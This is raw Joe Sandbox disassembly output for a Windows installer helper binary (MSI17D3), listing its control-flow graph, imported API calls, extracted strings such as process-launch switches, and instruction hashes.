                                                                                                                                                                                control_flow_graph 477 cb52f0-cb53a8 call cb63a0 call cb5d30 * 2 call cb59c0 486 cb53ae-cb53bd 477->486 487 cb57b0-cb57ba call cb11d0 477->487 488 cb53c9-cb53db call cd7852 486->488 489 cb53bf-cb53c7 call cb49a0 486->489 488->487 496 cb53e1-cb540a call cb5d30 488->496 489->488 499 cb540c-cb540f 496->499 500 cb5414-cb5419 496->500 499->500 501 cb54cf-cb551b 500->501 502 cb541f-cb5429 500->502 504 cb5529-cb552b 501->504 505 cb551d-cb5526 GetForegroundWindow 501->505 503 cb5430-cb5436 502->503 508 cb5438-cb543b 503->508 509 cb5456-cb5458 503->509 506 cb5531-cb5535 504->506 507 cb55f7-cb5607 ShellExecuteExW 504->507 505->504 510 cb5540-cb554c 506->510 511 cb5537-cb553e 506->511 512 cb5609-cb5612 call cb5890 507->512 513 cb5614-cb5616 507->513 514 cb543d-cb5445 508->514 515 cb5452-cb5454 508->515 516 cb545b-cb545d 509->516 519 cb5550-cb555d 510->519 511->510 511->511 512->513 521 cb5618-cb561e 513->521 522 cb5646-cb5666 call cb5b30 513->522 514->509 523 cb5447-cb5450 514->523 515->516 517 cb545f 516->517 518 cb5493-cb54cc GetWindowsDirectoryW call cb5b10 * 2 516->518 524 cb5464-cb546a 517->524 518->501 519->519 525 cb555f-cb556b 519->525 527 cb5620-cb5623 521->527 528 cb5625-cb563b ShellExecuteExW 521->528 543 cb56fd-cb5702 522->543 544 cb566c-cb5696 GetModuleHandleW GetProcAddress AllowSetForegroundWindow 522->544 523->503 523->515 531 cb548a-cb548c 524->531 532 cb546c-cb546f 524->532 533 cb5570-cb557d 525->533 527->522 527->528 528->522 534 cb563d-cb5641 call cb5890 528->534 540 cb548f-cb5491 531->540 537 cb5471-cb5479 532->537 538 cb5486-cb5488 532->538 533->533 539 cb557f-cb55f5 call cb64a0 * 5 533->539 534->522 537->531 545 cb547b-cb5484 537->545 538->540 539->507 540->501 540->518 548 cb5721-cb5744 call cb5940 543->548 549 cb5704-cb570c 543->549 544->543 555 cb5698-cb569f 544->555 545->524 545->538 557 cb574e-cb5762 548->557 558 cb5746-cb5749 548->558 549->548 553 cb570e-cb571b WaitForSingleObject GetExitCodeProcess 549->553 553->548 555->543 559 cb56a1-cb56b2 GetModuleHandleW GetProcAddress 555->559 563 cb576c-cb5781 557->563 564 cb5764-cb5767 557->564 558->557 561 cb56fa 559->561 562 cb56b4-cb56c1 559->562 561->543 572 cb56c3-cb56c6 562->572 566 cb578b-cb57af call cd2937 563->566 567 cb5783-cb5786 563->567 564->563 567->566 575 cb56c8-cb56eb Sleep EnumWindows 572->575 576 cb56ef-cb56f1 572->576 575->572 579 cb56ed 575->579 576->561 580 cb56f3-cb56f4 BringWindowToTop 576->580 579->580 580->561
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00CB549C
                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00CB551D
                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00CB5601
                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00CB5637
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00CB567C
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB5685
                                                                                                                                                                                • AllowSetForegroundWindow.USER32(00000000), ref: 00CB568B
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00CB56AB
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB56AE
                                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00CB56CA
                                                                                                                                                                                • EnumWindows.USER32(00CB5830,?), ref: 00CB56DF
                                                                                                                                                                                • BringWindowToTop.USER32(00000000), ref: 00CB56F4
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00CB5711
                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00CB571B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                                                                • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                • API String ID: 697762045-2796270252
                                                                                                                                                                                • Opcode ID: 5f7523f797f1dc86c80a6c2b522513d1188e31cea0f0e89b947a55a4c9f988cc
                                                                                                                                                                                • Instruction ID: 746b8af284240c07dd8e2134712b61d406e4fcc7a2cf03f9e67ac55f2f24534e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f7523f797f1dc86c80a6c2b522513d1188e31cea0f0e89b947a55a4c9f988cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 80E1C171E00A099BDF10DFA8C884BEEB7B5EF44310F544269E819AB395EB349E45CF61
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00CBCBB6
                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00D0E6D0,00000800), ref: 00CBCBD3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: OpenQueryValue
                                                                                                                                                                                • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                • API String ID: 4153817207-482544602
                                                                                                                                                                                • Opcode ID: 401ae014a6cbd01f0de0c948d43bf425f9f2c0e99b9437bb5a1a46a151a96322
                                                                                                                                                                                • Instruction ID: e4f565068f234b1425d1431cca6dcf86b413b22ab645fe4115cf1208d877578f
                                                                                                                                                                                • Opcode Fuzzy Hash: 401ae014a6cbd01f0de0c948d43bf425f9f2c0e99b9437bb5a1a46a151a96322
                                                                                                                                                                                • Instruction Fuzzy Hash: 11C1F535A042168BDB349F14D8C13FAB7A1EFA0740F58445EE8A9DB294E771CF82C7A5
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,665E9022,?), ref: 00CB38CB
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CB390B
                                                                                                                                                                                • Process32FirstW.KERNEL32(?,00000000), ref: 00CB395F
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00CB397A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CB3A8E
                                                                                                                                                                                • Process32NextW.KERNEL32(?,00000000), ref: 00CB3AA2
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00CB3AF0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 708755948-0
                                                                                                                                                                                • Opcode ID: a170a8a2562efb72041a2a7ca10d540e2f518481692ea66b7c5f49fdae3e5a11
                                                                                                                                                                                • Instruction ID: c5cf2a5d670200400fdad8bfca4514893dbf028dbd15c5ce0d9bc478bad348dc
                                                                                                                                                                                • Opcode Fuzzy Hash: a170a8a2562efb72041a2a7ca10d540e2f518481692ea66b7c5f49fdae3e5a11
                                                                                                                                                                                • Instruction Fuzzy Hash: 87A108B1901249DFDF10CFA9D988BEEBBF8BF48304F248159E915AB280D7745A44DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                • Opcode ID: 8a93d6f6ce7c47c42d159fd89570bd776e88f6203a99c68e177734dc8ab1a0ef
                                                                                                                                                                                • Instruction ID: db34840669bf4f8026fe1578fe35eb2ea7dcbf94eca1c951e18fb2a42e90faf2
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a93d6f6ce7c47c42d159fd89570bd776e88f6203a99c68e177734dc8ab1a0ef
                                                                                                                                                                                • Instruction Fuzzy Hash: F6D25972E082688FDB65CF29CD407EAB7B5EB44304F2441EAD55DE7241EB74AE828F41
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00CEE8D1,00000002,00000000,?,?,?,00CEE8D1,?,00000000), ref: 00CEE64C
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00CEE8D1,00000002,00000000,?,?,?,00CEE8D1,?,00000000), ref: 00CEE675
                                                                                                                                                                                • GetACP.KERNEL32(?,?,00CEE8D1,?,00000000), ref: 00CEE68A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                • Opcode ID: 45fc391ef6189e05adbc8004db3f9ee7b94acbbe63085de787b6af20b8c51015
                                                                                                                                                                                • Instruction ID: 4c687d65a23f514a13564151fcd91c4f9cffdc54b4fa43fa02b3acd0c0f77795
                                                                                                                                                                                • Opcode Fuzzy Hash: 45fc391ef6189e05adbc8004db3f9ee7b94acbbe63085de787b6af20b8c51015
                                                                                                                                                                                • Instruction Fuzzy Hash: F721A172700189A7DB348F57C901BAB73AAAB64BE4B568464F91ADB214E732DE40C350
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _swprintf$FreeLocal
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2429749586-0
                                                                                                                                                                                • Opcode ID: c454f1431bbc8bfb94a30d842973ef90819b7ac2eefb59ad38ed30836fa03d01
                                                                                                                                                                                • Instruction ID: 1b716d647aff5a59f2690a79091dd1c9ce1c8e04f053f5a83ffcfff31479f52a
                                                                                                                                                                                • Opcode Fuzzy Hash: c454f1431bbc8bfb94a30d842973ef90819b7ac2eefb59ad38ed30836fa03d01
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F19B71D10219ABDF18DFA9DC40BEEBBB9FF49310F144229FA11A7281D735A941CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00CEE894
                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00CEE8DD
                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00CEE8EC
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CEE934
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CEE953
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                • Opcode ID: ecc1baf0700693114882220e4759da6cba609645ae6b2887c8d407a606fdf8e3
                                                                                                                                                                                • Instruction ID: d9bff4f688d55f9951285132862fcdc0b58d6af1dc3f928d5ac62d5505946aa7
                                                                                                                                                                                • Opcode Fuzzy Hash: ecc1baf0700693114882220e4759da6cba609645ae6b2887c8d407a606fdf8e3
                                                                                                                                                                                • Instruction Fuzzy Hash: AC519171A00359AFEB20DFAADC45BBE73B8FF48780F144069E924E7191E7709A04DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                • Instruction ID: b3079be243bbe2d0b67e35639198ebc82c218bb91bb3d5264834ad8ae6bb3c88
                                                                                                                                                                                • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                • Instruction Fuzzy Hash: A6B19C72D006D59FDB15CF6AC881BFEBBA5EF59344F14816AE911AB341D238DE01CBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00CEB0C8
                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CEB143
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00CEB165
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00CEB188
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1164774033-0
                                                                                                                                                                                • Opcode ID: 24b04528ab72fb9d02890b9b7e5d3fb82fc72938f9de248cb59d83c9ab11a733
                                                                                                                                                                                • Instruction ID: a69a4dc72fb5f2e96ed348dabb2b81f30cadb0cefd78f5e7ce078ecbfd5b6ae5
                                                                                                                                                                                • Opcode Fuzzy Hash: 24b04528ab72fb9d02890b9b7e5d3fb82fc72938f9de248cb59d83c9ab11a733
                                                                                                                                                                                • Instruction Fuzzy Hash: 8941D671900269AFDB20EFAACC99ABFB7B8EF85314F144195E419D3140EB309F80CB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CD33B4
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00CD3480
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CD34A0
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00CD34AA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                • Opcode ID: 8a6f23c02d5e50972b8eb97f85ba324c04f05543b826f61d1c4efeaf3d53547f
                                                                                                                                                                                • Instruction ID: 46fa8827902833cf0574371290179634fdc34be2dda4ab201034c4bbf7254c67
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a6f23c02d5e50972b8eb97f85ba324c04f05543b826f61d1c4efeaf3d53547f
                                                                                                                                                                                • Instruction Fuzzy Hash: 98314A75D0521C9BDB10DFA0D989BCCBBB8AF08304F1041EAE60CAB250EB759B85DF45
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CBC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,665E9022,?,00CF3D30,000000FF), ref: 00CBC657
                                                                                                                                                                                  • Part of subcall function 00CBC630: GetLastError.KERNEL32(?,00000000,00000000,665E9022,?,00CF3D30,000000FF), ref: 00CBC661
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,00D08AF0), ref: 00CBD0D8
                                                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00D08AF0), ref: 00CBD0E7
                                                                                                                                                                                Strings
                                                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CBD0E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                • API String ID: 3511171328-631824599
                                                                                                                                                                                • Opcode ID: b0af9bda34a16092da2b008423de561ee69d9561cea39001241cdbddf32ad0aa
                                                                                                                                                                                • Instruction ID: c0ad3e525e9742b1d9efb80888d826855369d39dba9af117f859f7dbde315155
                                                                                                                                                                                • Opcode Fuzzy Hash: b0af9bda34a16092da2b008423de561ee69d9561cea39001241cdbddf32ad0aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 75E092B06047418FD760AF28F5487977BE4AF10304F008A6CE45AC2340EBB5D489CBA3
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE28B
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE2D5
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE39B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 661929714-0
                                                                                                                                                                                • Opcode ID: 0f56328b1b8bec30bd2024d87166d5ba937ff1787d0c857ec5ac61852802b39f
                                                                                                                                                                                • Instruction ID: 768629cdee1ba4f6d039d77a6c2b5ad933bc86764d458dd9781bee8707495bf3
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f56328b1b8bec30bd2024d87166d5ba937ff1787d0c857ec5ac61852802b39f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3961C1715002479FEB28DF66CC82BBA73A8FF08350F10417AE925C7295E738DA94DB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CD6F13
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CD6F1D
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CD6F2A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: eb2037618105da4f7fb1b4599bbf0e89134fa3a2f1c0ef8076fe2c554ab142d8
                                                                                                                                                                                • Instruction ID: 0118e5530f8f45a88ef9cd65a8074d5e11255b1238a519047b74b0d8d4060b6a
